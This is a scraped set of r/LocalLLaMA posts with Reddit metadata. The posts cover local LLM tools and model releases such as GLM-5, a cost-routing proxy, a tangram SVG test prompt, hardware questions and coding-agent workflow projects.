'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?width=1080&crop=smart&auto=webp&s=5903a143841e25f04a02056b5ed84484135bfb15', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/gwFuIxjtz1_ftifjHje8QhJzMoecPpO-KU-tTUrRCxc.jpeg?auto=webp&s=e1ebb1fb5ce772f7fa2447458a16ab66f8c06c76', 'width': 1200}, 'variants': {}}]} |
I built a local proxy to save 90% on OpenClaw/Cursor API costs by auto-routing requests | 0 | Hey everyone,
I realized I was wasting money using Claude 3.5 Sonnet for simple "hello world" or "fix this typo" requests in OpenClaw. So I built **ClawRoute**.
It's a local proxy server that sits between your editor (OpenClaw, Cursor, VS Code) and the LLM providers.
**How it works:**
1. Intercepts the request (strictly local, no data leaves your machine)
2. Uses a fast local heuristic to classify complexity (Simple vs Complex)
3. Routes simple tasks to cheap models (Gemini Flash, Haiku) and complex ones to SOTA models
4. **Result:** Savings of \~60-90% on average in my testing.
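The classifier itself isn't shown here, but the routing shape is roughly this. Model names, keywords, and thresholds below are illustrative placeholders, not ClawRoute's actual values:

```python
# Illustrative sketch of heuristic request routing; the real ClawRoute
# classifier and routing targets may differ.
CHEAP, SOTA = "gemini-flash", "claude-sonnet"  # placeholder model names

COMPLEX_HINTS = ("refactor", "architecture", "debug", "optimize", "migrate")

def route(prompt: str) -> str:
    """Fast local heuristic: length + keyword scan, no LLM call needed."""
    if len(prompt.split()) > 80 or any(h in prompt.lower() for h in COMPLEX_HINTS):
        return SOTA
    return CHEAP

print(route("fix this typo"))                   # routes to the cheap model
print(route("refactor the auth architecture"))  # routes to the SOTA model
```

Because the heuristic runs locally before any provider is contacted, the classification itself costs nothing, and "Dry Run" mode can log these decisions without actually switching models.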
**v1.1 Update:**
* New Glassmorphism Dashboard
* Real-time savings tracker
* "Dry Run" mode to test safe routing without changing models
* Built with Hono + Node.js (TypeScript)
It's 100% open source. Would love feedback! [ClawRoute](https://github.com/atharv404/ClawRoute) | 2026-02-11T18:11:54 | https://www.reddit.com/r/LocalLLaMA/comments/1r24vbz/i_built_a_local_proxy_to_save_90_on/ | 0xatharv | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24vbz | false | null | t3_1r24vbz | /r/LocalLLaMA/comments/1r24vbz/i_built_a_local_proxy_to_save_90_on/ | false | false | self | 0 | null |
HLE is a strange test? | 0 | I noticed that HLE scores always get better as the model parameter count gets bigger; I have seen no moderate-sized model ever reach a high score. Isn't the exam supposed to depend on "reasoning" rather than "knowledge"? GLM-4.7 was a huge jump, but after it scaled up to a size similar to Kimi K2.5 it scored even higher; the HLE score seems to grow almost linearly with parameter count. | 2026-02-11T18:11:09 | https://www.reddit.com/r/LocalLLaMA/comments/1r24uma/hle_is_a_strange_test/ | perfect-finetune | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24uma | false | null | t3_1r24uma | /r/LocalLLaMA/comments/1r24uma/hle_is_a_strange_test/ | false | false | self | 0 | null |
one simple but difficult test prompt | 0 | Inspired by the pelican SVG test from Simon Willison, I usually use the following simple but difficult prompt to test LLMs. When using this test prompt, the LLM is not allowed to use search tools, in case it finds the solution online. Most LLMs fail. Have fun.
The test prompt:
generate a rectangle made of a set of tangram in svg
following are analysis of the prompt by claude:
That's a nice, deceptively simple prompt! Here's what it tests:
**Geometric/spatial reasoning** — Tangrams have 7 specific pieces (2 large triangles, 1 medium triangle, 2 small triangles, 1 square, 1 parallelogram) with fixed proportional relationships. The model needs to know this and figure out how to arrange them into a rectangle, which requires genuine spatial problem-solving.
**Mathematical precision** — Getting the coordinates right so the pieces actually fit together with no gaps or overlaps demands accurate calculation. The pieces have irrational dimensions (√2 shows up constantly), so the model has to handle that cleanly.
**SVG fluency** — The model needs to produce valid SVG markup with correct polygon points, and ideally make it visually clear (distinct colors, proper viewBox, etc.).
**Constraint satisfaction** — All 7 pieces must be used exactly once, they must tile perfectly, and the result must be a rectangle. This is a multi-constraint problem where getting one piece wrong cascades into everything else being off.
**Knowledge recall vs. reasoning** — A model might "know" standard tangram arrangements from training data, or it might have to reason through the geometry from scratch. This tests whether it can do either reliably.
**Where models typically fail:**
* Pieces overlap or leave gaps (most common failure)
* Wrong number of pieces or wrong proportions
* The pieces don't actually form a rectangle when you render the SVG
* Coordinates are slightly off due to floating-point sloppiness with √2
It's a good discriminator because it looks easy but requires the intersection of spatial reasoning, math, and code generation to all work simultaneously. A model that can nail this is doing something non-trivial. You could make it even harder by specifying "use each of the 7 standard tangram pieces exactly once" explicitly, or asking for a non-standard shape like a cat or a swan.
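For calibration, here is one known-good arrangement (a square, which satisfies the rectangle requirement), scaled to a side of 8 so every vertex is an integer and the √2 issue disappears. These coordinates are one standard dissection, not the only one; the shoelace check below confirms the seven pieces account for the full area:

```python
# Classic 7-piece tangram square (side 8), emitted as SVG polygons.
PIECES = {
    "large-1":       [(0, 0), (0, 8), (4, 4)],
    "large-2":       [(0, 8), (8, 8), (4, 4)],
    "medium":        [(4, 0), (8, 0), (8, 4)],
    "small-1":       [(0, 0), (4, 0), (2, 2)],
    "square":        [(2, 2), (4, 0), (6, 2), (4, 4)],
    "parallelogram": [(6, 2), (8, 4), (8, 8), (6, 6)],
    "small-2":       [(4, 4), (6, 2), (6, 6)],
}

def shoelace(pts):
    """Polygon area via the shoelace formula."""
    n = len(pts)
    s = sum(pts[i][0] * pts[(i + 1) % n][1] - pts[(i + 1) % n][0] * pts[i][1]
            for i in range(n))
    return abs(s) / 2

def to_svg():
    colors = ["#e41a1c", "#377eb8", "#4daf4a", "#984ea3",
              "#ff7f00", "#ffff33", "#a65628"]
    polys = [
        f'<polygon points="{" ".join(f"{x},{y}" for x, y in pts)}" fill="{c}"/>'
        for pts, c in zip(PIECES.values(), colors)
    ]
    return ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 8 8">'
            + "".join(polys) + "</svg>")

# Pieces must account for the full 8x8 square (checks area, the usual failure mode).
assert sum(shoelace(p) for p in PIECES.values()) == 64
print(to_svg())
```

A model that outputs anything equivalent to this passes; most instead produce overlapping pieces, which is exactly what the area check catches.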
| 2026-02-11T18:08:06 | https://www.reddit.com/r/LocalLLaMA/comments/1r24rfx/one_simple_but_difficult_test_prompt/ | Ok-Coat-1895 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24rfx | false | null | t3_1r24rfx | /r/LocalLLaMA/comments/1r24rfx/one_simple_but_difficult_test_prompt/ | false | false | self | 0 | null |
We built an MCP server with 26 tools that lets LLMs do multi-step health data analysis. Here's the architecture | 3 | The platform will be entering beta in the next few weeks with OpenAI/Anthropic as providers, but after beta we'll be exposing the MCP server via API token — so you'll be able to point your local models (Llama, Mistral, etc.) at the full 26-tool suite and run queries against your own health data without going through a cloud LLM! | 2026-02-11T17:56:56 | https://blog.getomn.io/posts/why-we-built-an-mcp-server-for-health-data/ | ultraHQ | blog.getomn.io | 1970-01-01T00:00:00 | 0 | {} | 1r24ft3 | false | null | t3_1r24ft3 | /r/LocalLLaMA/comments/1r24ft3/we_built_an_mcp_server_with_26_tools_that_lets/ | false | false | default | 3 | null |
GLM 5 is already on huggingface! | 68 | [https://huggingface.co/zai-org/GLM-5](https://huggingface.co/zai-org/GLM-5) | 2026-02-11T17:49:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r248cj/glm_5_is_already_on_huggingface/ | oiuht54 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r248cj | false | null | t3_1r248cj | /r/LocalLLaMA/comments/1r248cj/glm_5_is_already_on_huggingface/ | false | false | self | 68 | null |
Recommendations for SLM on RTX 3050TI | 1 | Hi, I have a constrained hardware stack to run local models. I know, but I cannot upgrade.
\- RTX 3050 TI - 4GB Vram
\- Intel Corporation Alder Lake-P GT1 \[UHD Graphics\]
\- 32 GB Ram
\- 12th Gen Intel Core i7-12650Hx 10 Cores
\- Debian Trixie
\- Coding needs: debug, architecture, recommendations, generation, mainly Python. I'm a backend developer, so I'm not solving great coding challenges.
So I need to locally run an agentic coding model, due to an NDA and utter dissatisfaction with Antigravity. I also find it fun to run local models.
I have looked around and read that GPT-OSS is good for coding, and given my constraints I'd consider the 20B version.
But I also prefer to avoid a generalist model, or a distilled version of a foundation model. I prefer a model trained on large codebases.
Just for info, I know I can "delegate" part of the GPU load to the CPU, yes, downgrading token speed by 10x. But that is OK.
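For sizing, the back-of-envelope math I use is weights-only; KV cache and activations come on top, and the bits-per-weight figures below are rough assumptions, not measured values:

```python
# Rough VRAM estimate for a quantized model (weights only, assumption-laden).
def model_gb(params_b: float, bits_per_weight: float) -> float:
    """GB needed for the weights: billions of params times bits, over 8."""
    return params_b * bits_per_weight / 8  # 1B params at 8 bits = 1 GB

# Assuming ~3.5 GB of the 4 GB card is usable after the driver/context take theirs.
USABLE_VRAM_GB = 3.5

for name, params, bits in [
    ("20B @ ~4.25-bit", 20, 4.25),
    ("7B @ Q4_K_M (~4.8 bits)", 7, 4.8),
    ("3B @ Q4_K_M (~4.8 bits)", 3, 4.8),
]:
    gb = model_gb(params, bits)
    offload = max(0.0, gb - USABLE_VRAM_GB)
    print(f"{name}: ~{gb:.1f} GB weights -> ~{offload:.1f} GB spills to system RAM")
```

So on 4GB of VRAM, anything in the 20B class lives mostly in system RAM, which is why the 10x slowdown is unavoidable; a 3B-4B coder model fits almost entirely on the card.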
And also read in iGPU documentation that "It features 768 shading units, 48 texture mapping units and 24 ROPs.". So what if both GPUs can share the load as well as CPU?
Indeed Intel Alder-Lake is pretty decent, via thunderbolt 4, I connected two additional screens without any issue.
So, based on your knowledge and experience, what are your recommendations for one or two good SLMs just for coding? Please remember that the intended use is exclusively as coding agents. | 2026-02-11T17:45:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r243s1/recommendations_for_slm_on_rtx_3050ti/ | johnmacleod99 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r243s1 | false | null | t3_1r243s1 | /r/LocalLLaMA/comments/1r243s1/recommendations_for_slm_on_rtx_3050ti/ | false | false | self | 1 | null |
Tested GLM 5: Great model | 14 | Seems to be the same model as Pony Alpha from the responses, but better! | 2026-02-11T17:44:34 | https://v.redd.it/t1g8s0j7kwig1 | sirjoaco | /r/LocalLLaMA/comments/1r243bg/tested_glm_5_great_model/ | 1970-01-01T00:00:00 | 0 | {} | 1r243bg | false | null | t3_1r243bg | /r/LocalLLaMA/comments/1r243bg/tested_glm_5_great_model/ | false | false | 14 | {'enabled': False, 'images': [{'id': 'bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz', 'resolutions': [{'height': 61, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=108&crop=smart&format=pjpg&auto=webp&s=05304752bd1e8595ac1c4bbcda60409e75a02afd', 'width': 108}, {'height': 123, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=216&crop=smart&format=pjpg&auto=webp&s=6356ed82c13905c414893b437446ab6579e0d8f0', 'width': 216}, {'height': 182, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=320&crop=smart&format=pjpg&auto=webp&s=e0b2fcd7e4e624930054e0b7fe83f4808b928ea3', 'width': 320}, {'height': 365, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=640&crop=smart&format=pjpg&auto=webp&s=4bb7aa15ebd32cb8f3339719ec6c42b2d5b0bae2', 'width': 640}, {'height': 547, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=960&crop=smart&format=pjpg&auto=webp&s=a75ae47e7aa4d64151848b39948dae3f2c41cdea', 'width': 960}, {'height': 616, 'url': 'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?width=1080&crop=smart&format=pjpg&auto=webp&s=8e553858f199eea9c70ed0d42f2a6d05c6f39dc7', 'width': 1080}], 'source': {'height': 1722, 'url': 
'https://external-preview.redd.it/bzJiMzh5ajdrd2lnMc0sk44cwuityrkv6bPNqII0lNadp-NXPigbagKTulbz.png?format=pjpg&auto=webp&s=57af7d4ca94bfe4f6232e574734f4debad0f49c9', 'width': 3018}, 'variants': {}}]} | |
I'm 19 and self learning: Built a CLI tool for structured ideation using local LLMs (Ollama/MLX) - First ever project, looking for feedback :) | 0 | # Built my first project: A CLI tool that turns vague ideas into structured concepts using local LLMs
**TL;DR:** Self-taught 19yo dev here. Built a tool that takes "I want to build an app" and asks the right questions until you have a clear problem statement, target audience, and differentiation strategy. Works completely offline with Ollama/MLX. Looking for critique and opportunities to learn.
---
## The Problem I Was Trying to Solve
Ever notice how most side projects die because the idea was too vague to begin with?
*"I want to build a language learning app"* sounds like an idea, but it's missing everything: who it's for, what specific problem it solves, why it's different from Duolingo, and whether you even care enough to finish it.
I built **ideanator** to systematically uncover what's missing through structured questioning.
---
## How It Works
The tool runs a 4-phase framework I called **ARISE** (Anchor → Reveal → Imagine → Scope):
1. **Vagueness Scorer** analyzes your idea and identifies what's missing (motivation, audience, problem, etc.)
2. **Structured Questioning** asks targeted questions phase-by-phase to fill those gaps
3. **Refactoring Engine** transforms the conversation into a clean, faithful idea statement
Here's what the output looks like after a conversation:
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
REFINED IDEA STATEMENT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ONE-LINER: I'm building a conversational Spanish practice tool
for college students who find Duolingo too gamified and not
focused enough on real dialogue.
PROBLEM: College students trying to learn conversational Spanish
hit a wall — existing apps drill vocabulary but never simulate
actual conversations.
DIFFERENTIATOR: Unlike Duolingo and Babbel which sort by
grammar level, this matches on conversational ability and
focuses exclusively on dialogue — no flashcards, no points.
OPEN QUESTIONS:
• How would you measure conversational improvement?
• What's the minimum viable conversation scenario?
VALIDATION: confidence=0.87 | refinement rounds=0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
```
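Under the hood, the vagueness scorer's contract is simple: idea in, list of missing dimensions out. The real scorer prompts the LLM; this toy keyword version (cue words are mine, purely illustrative) just shows the interface:

```python
# Toy vagueness scorer: maps each dimension to cue words and reports which
# dimensions an idea statement fails to cover. The real tool uses an LLM.
DIMENSIONS = {
    "audience": ("for ", "students", "developers", "teams"),
    "problem": ("problem", "struggle", "pain", "hit a wall"),
    "differentiator": ("unlike", "instead of", "compared to"),
}

def missing_dimensions(idea: str) -> list[str]:
    text = idea.lower()
    return [dim for dim, cues in DIMENSIONS.items()
            if not any(cue in text for cue in cues)]

print(missing_dimensions("I want to build a language learning app"))
# every dimension is missing -> the questioning phases target all three
```

Each ARISE phase then only asks about the dimensions still missing, which is also how the anti-generic check works: a question that doesn't map to a missing dimension gets flagged.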
---
## What I Built
**Tech Stack:**
- Python 3.11+
- Works with Ollama, MLX (Apple Silicon), or any OpenAI-compatible API
- Completely offline/local LLM support
- 162 tests with full mock client coverage
**Key Features:**
- **Inverted Vagueness Scorer** - Uses prompt engineering to identify missing dimensions
- **Anti-Generic Question Check** - Detects and flags generic questions that could apply to any idea
- **Three-Stage Refactoring Engine** - Extract → Synthesize → Validate with self-refinement loop
- **Cross-platform** - Works on macOS, Linux, Windows
**Architecture highlights:**
- Backend-agnostic LLM abstraction layer
- Smart server lifecycle management (only starts if not running)
- Batch mode for testing multiple ideas
- Full prompt customization system
---
## My Background
I'm 19, teaching myself AI/ML development. This is my **first real project** — before this, I'd only done tutorials and small scripts.
I have spent almost a year now experimenting with AI
- Learning the basics of coding
- Understanding prompt engineering deeply enough to properly use coding agents
- Understanding the behaviour of LLMs: where they do well and where they fail
---
## What I'm Looking For
**Critique:**
- Is the architecture sound? (I'm self-taught, so I probably did things wrong)
- How's the code quality? Be brutal.
- Is the problem worth solving, or am I building a solution looking for a problem?
- MAJOR: Could I ever use GRPO to finetune an SLM to do a similar thing (specifically ask effective questions)
**Opportunities:**
- Internships or apprenticeships where I can learn from experienced devs
- Open source projects that need contributors
- Mentorship on what to learn next
I'm trying to prove I can build real things and learn fast. This project is evidence of work ethic; if you met me, you would know very quickly that when I want something, I will work as hard as I can to get it. I would greatly benefit from a chance to grow in a professional environment and get my foot in the door.
Please do try it :) Thank you for reading :) | 2026-02-11T17:43:58 | https://www.reddit.com/r/LocalLLaMA/comments/1r242ot/im_19_and_self_learning_built_a_cli_tool_for/ | Any-Wish-943 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r242ot | false | null | t3_1r242ot | /r/LocalLLaMA/comments/1r242ot/im_19_and_self_learning_built_a_cli_tool_for/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': '-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=108&crop=smart&auto=webp&s=de799ef3fb2a25b34dd21eb83dd182b825171299', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=216&crop=smart&auto=webp&s=53fd780a584c496b01021b8dd6ead5c0f0191fe4', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=320&crop=smart&auto=webp&s=c95866171f374a20f539cb52d84bd3de4dbfff45', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=640&crop=smart&auto=webp&s=2138df369879cb3c69c0614b2bad23245995c48d', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=960&crop=smart&auto=webp&s=71351b726c3e5ded62c981521e76e1919a290708', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?width=1080&crop=smart&auto=webp&s=e36aa802ecdc68c8ea37f6fde683100daf4ad24f', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/-N6pVXH-fYz1_zzvKWpa6tVdByDKpiFYkzISd5FrMSI.png?auto=webp&s=eadf4d38cc6be09a687aea0bb96ed224ae7b23c1', 'width': 1200}, 'variants': {}}]} |
Openclaw with Small local model | 0 | Does anyone run clawdbot/openclaw with a small model like TinyLlama, or any other small model, locally? My virtual machine has small specs (I'm trying to run clawdbot on an Oracle VM). I want to use clawdbot mainly for web scraping; can I do it with this kind of model? | 2026-02-11T17:43:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r24264/openclaw_with_small_local_model/ | Chathura_Lanarol | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r24264 | false | null | t3_1r24264 | /r/LocalLLaMA/comments/1r24264/openclaw_with_small_local_model/ | false | false | self | 0 | null |
zai-org/GLM-5 · Hugging Face | 144 | 2026-02-11T17:39:19 | https://huggingface.co/zai-org/GLM-5 | TellMeAboutGoodManga | huggingface.co | 1970-01-01T00:00:00 | 0 | {} | 1r23xsm | false | null | t3_1r23xsm | /r/LocalLLaMA/comments/1r23xsm/zaiorgglm5_hugging_face/ | false | false | default | 144 | null | |
zai-org/GLM-5 · Hugging Face | 2 | from Z.ai:
We are launching GLM-5, targeting complex systems engineering and long-horizon agentic tasks. Scaling is still one of the most important ways to improve the intelligence efficiency of Artificial General Intelligence (AGI). Compared to GLM-4.5, GLM-5 scales from 355B parameters (32B active) to 744B parameters (40B active), and increases pre-training data from 23T to 28.5T tokens. GLM-5 also integrates DeepSeek Sparse Attention (DSA), largely reducing deployment cost while preserving long-context capacity.
Reinforcement learning aims to bridge the gap between competence and excellence in pre-trained models. However, deploying it at scale for LLMs is a challenge due to the RL training inefficiency. To this end, we developed [slime](https://github.com/THUDM/slime), a novel **asynchronous RL infrastructure** that substantially improves training throughput and efficiency, enabling more fine-grained post-training iterations. With advances in both pre-training and post-training, GLM-5 delivers significant improvement compared to GLM-4.7 across a wide range of academic benchmarks and achieves best-in-class performance among all open-source models in the world on reasoning, coding, and agentic tasks, closing the gap with frontier models. | 2026-02-11T17:37:44 | https://huggingface.co/zai-org/GLM-5 | jacek2023 | huggingface.co | 1970-01-01T00:00:00 | 0 | {} | 1r23w7v | false | null | t3_1r23w7v | /r/LocalLLaMA/comments/1r23w7v/zaiorgglm5_hugging_face/ | false | false | default | 2 | null |
Both Zhipu and MiniMax have released new models, it seems they're getting ready for the holiday | 4 | 2026-02-11T17:37:40 | https://www.reddit.com/r/LocalLLaMA/comments/1r23w5j/both_zhipu_and_minimax_have_released_new_models/ | Intelligent_Front701 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23w5j | false | null | t3_1r23w5j | /r/LocalLLaMA/comments/1r23w5j/both_zhipu_and_minimax_have_released_new_models/ | false | false | 4 | null | ||
How do I properly install LM Studio on my PC? | 0 | Hi, I am new to local LLMs and have just installed LM Studio, Windows GUI edition. My specs: Tiny11, Dell Precision T1600, 2nd-gen i7 CPU, GTX 1050 Ti 8GB VRAM, and 16GB RAM. I tried installing the phi-4-mini model, but the error message "No LM Runtime found for model format 'gguf'" appears each time. I would like to know how to fix it, and could you recommend a better-suited model for my PC? | 2026-02-11T17:21:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r23fxs/how_do_i_properly_install_lm_studio_on_my_pc/ | hjalgid47 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23fxs | false | null | t3_1r23fxs | /r/LocalLLaMA/comments/1r23fxs/how_do_i_properly_install_lm_studio_on_my_pc/ | false | false | self | 0 | null |
I built a workflow tool for running multiple or custom agents for coding -- Now with local model support [X-POST LocalLLM] | 2 | It’s hard to keep up with all the new AI goodies: BEADS, Skills, Ralph Wiggum, BMad, the newest MCP etc. There’s not really a “golden” pattern yet. More importantly when I do find a flow I like, it’s not like I want to use it for every single task. Not everything’s a nail, and we need more tools than just a hammer.
So I built a tool that lets me create custom workflows, and it’s been pretty powerful for me. You can combine multiple agents together with commands, approvals, and more. CEL allows you to inject messages from different agents into others’ contexts, or conditionally route to different nodes and sub-workflows. Basically Cursor meets N8N (at least that’s the goal). When starting a chat you can select different workflows, or even allow the LLM to route to different workflows itself.
I’m pretty pleased with the result, with my favorite workflow being a custom checklist that has a toggle in the UI for me to “enable” different paths in the workflow itself.
# Enabled Patterns
**Custom Agents**
What’s cool is we provide the building blocks to create an agent: call\_llm, save\_message, execute tools, compact, and loop. So the basic chat in Reliant is just modeled via a yaml file.
Even the inputs aren’t hardcoded in our system. So with that you can create a custom agent that might leverage multiple LLM calls, or add custom approvals. We have a couple examples on our github for tool output filtering to preserve context, and in-flight auditing.
**Pairing Agents**
You can also pair agents in custom ways. The checklist and tdd workflows are the best examples of that. There’s a few thread models we support:
New, fork, and inherit (share). Workflows can also pass messages to each other.
**More complicated workflows**
The best is when you create a workflow tailored to your code. Our checklist will make sure lints and tests pass before handing off to a code reviewer agent. We might add another agent to clean up debug logs, and plan files. We’re using this to enforce cleaner code across our team, no matter the dev’s skill level.
You can also spawn parallel agents (in multiple worktrees if you prefer), to parallelize tasks.
We support creating workflows via our custom workflow builder agent, a drag and drop UI, or you can config-as-code with yaml files.
**Agent-spawned workflows**
Agents themselves can spawn workflows. And our system is a bit unique, where we allow you to pause the flow and interact with individual threads so that the sub-agents aren’t an opaque black box (this works for both agent-spawned and sub-workflows).
# Other Features
**Everything you need for parallel development**
Git worktrees are pretty standard these days, but we also have a full file editor, terminals, browser, and git-log scoped to your current worktree. You can also branch chats to different worktrees on demand which has been super helpful for my productivity to split things out when I need to.
**Generic presets act as agents**
One of the areas I want some feedback on. Instead of creating an “agent” we have a concept of grouped inputs (which typically map to an “agent” persona like a reviewer), but allow you to have presets for more parameter types.
Please roast it / poke holes. Also: if you’ve got your own setup, I’d love to see it!
You can check out some example workflows here [https://github.com/reliant-labs/reliant](https://github.com/reliant-labs/reliant)
Latest release has support for Codex subscriptions and local models -- no additional costs or fees on our end. | 2026-02-11T17:21:17 | https://www.reddit.com/r/LocalLLaMA/comments/1r23fi5/i_built_a_workflow_tool_for_running_multiple_or/ | reliant-labs | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23fi5 | false | null | t3_1r23fi5 | /r/LocalLLaMA/comments/1r23fi5/i_built_a_workflow_tool_for_running_multiple_or/ | false | false | self | 2 | {'enabled': False, 'images': [{'id': 'A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=108&crop=smart&auto=webp&s=46abe831c458d0807706fe47d730b1489343544a', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=216&crop=smart&auto=webp&s=6ef6bb4ed43453008ec40b3dc8b3ef3bf72af380', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=320&crop=smart&auto=webp&s=5f3a157f8b7a200791341b61779344e5bf4043bc', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=640&crop=smart&auto=webp&s=bc6fc1a68d1edf5cf1dab1a37f36f698be9171f9', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=960&crop=smart&auto=webp&s=daab1f0a24557dfae302a1ae57407859aba8bb96', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=1080&crop=smart&auto=webp&s=39b2745eee1abec175e71525b547388ec82d7ca7', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?auto=webp&s=bb7518a5345dcc6f8fd6d8539ec4760ac9649048', 'width': 1200}, 'variants': {}}]} |
Shadow Coding: A better alternative to Vibe Coding | 0 | Vibe Coding always felt counter-intuitive to me. As a developer, I think in code, not paragraphs.
To have to translate the rough code in my head into English, give it to the AI, and wait for it to figure out what I want and translate it back into code - all while spending precious time & tokens - felt like an unnecessary detour.
So I built Shadow Code, a VSCode extension that allows me to convert the pseudocode in my head to clean, accurate, high-quality code - using cheaper/open-source models and fewer tokens!
Do check it out!
* [Github Link.](https://github.com/adifyr/shadow-code)
* [YouTube Link](https://youtu.be/ZoNDQYYpl7E) | 2026-02-11T17:19:01 | https://v.redd.it/6hw95gelfwig1 | KanJuicy | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r23d95 | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/6hw95gelfwig1/DASHPlaylist.mpd?a=1773422357%2COTc1ZDcyMzA0NmE2MmVhOTZlYThiYjU3ZmVjMWM3MWJjYWY4OWIzMzJlNWVjMzkyNWFjNTgzZTNkMGZlNjZiZQ%3D%3D&v=1&f=sd', 'duration': 24, 'fallback_url': 'https://v.redd.it/6hw95gelfwig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1080, 'hls_url': 'https://v.redd.it/6hw95gelfwig1/HLSPlaylist.m3u8?a=1773422357%2CMjk4NDkzMmIxNTgyNTI2Y2Y0ZWEyNzE3Yjk5NzE0NmRkNjU0NjgzMGU3ODZkMGE5YzEzMDMwMjFlNmEzNTFiOA%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/6hw95gelfwig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1910}} | t3_1r23d95 | /r/LocalLLaMA/comments/1r23d95/shadow_coding_a_better_alternative_to_vibe_coding/ | false | false | 0 | {'enabled': False, 'images': [{'id': 'ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy', 'resolutions': [{'height': 61, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=108&crop=smart&format=pjpg&auto=webp&s=8525d297aabef49c339a8c27e522fa0bfddee74b', 'width': 108}, {'height': 122, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=216&crop=smart&format=pjpg&auto=webp&s=3695f258360ab722502a623480ee8dbab861725a', 'width': 216}, {'height': 180, 'url': 